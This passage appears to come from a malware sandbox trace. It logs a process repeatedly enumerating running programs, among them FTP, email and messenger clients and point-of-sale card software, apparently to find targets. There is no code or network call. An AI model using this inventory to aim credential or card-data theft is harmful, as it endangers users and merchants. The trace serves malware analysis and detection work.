cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0105.650] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0105.651] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0105.653] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0105.655] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0105.656] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0105.657] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0105.659] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0105.660] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0105.661] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0105.662] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0105.664] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0105.665] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0105.666] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0105.668] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0105.673] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0105.674] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0105.676] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0105.678] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0105.679] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0105.681] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0105.683] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0105.685] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0105.687] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0105.689] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0105.691] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0105.692] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0105.694] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0105.695] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0105.697] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0105.699] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0105.700] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0105.702] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0105.704] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0105.705] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0105.707] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0105.708] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0105.710] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0105.711] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0105.713] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0105.715] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0105.718] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0105.720] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0105.721] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0105.723] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0105.724] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0105.726] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0105.727] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0105.729] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0105.730] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0105.732] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0105.733] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0105.735] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0105.736] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0105.738] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0105.739] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0105.740] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0105.742] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0105.743] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.745] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.747] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0105.748] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0105.749] CloseHandle (hObject=0x1c08) returned 1 [0105.750] Sleep (dwMilliseconds=0x64) [0105.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0105.869] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.870] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.872] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.873] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.875] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.876] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.877] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.879] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.880] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.881] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.883] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.884] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.885] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.887] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.888] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.890] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.891] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.892] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.894] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.895] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.896] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 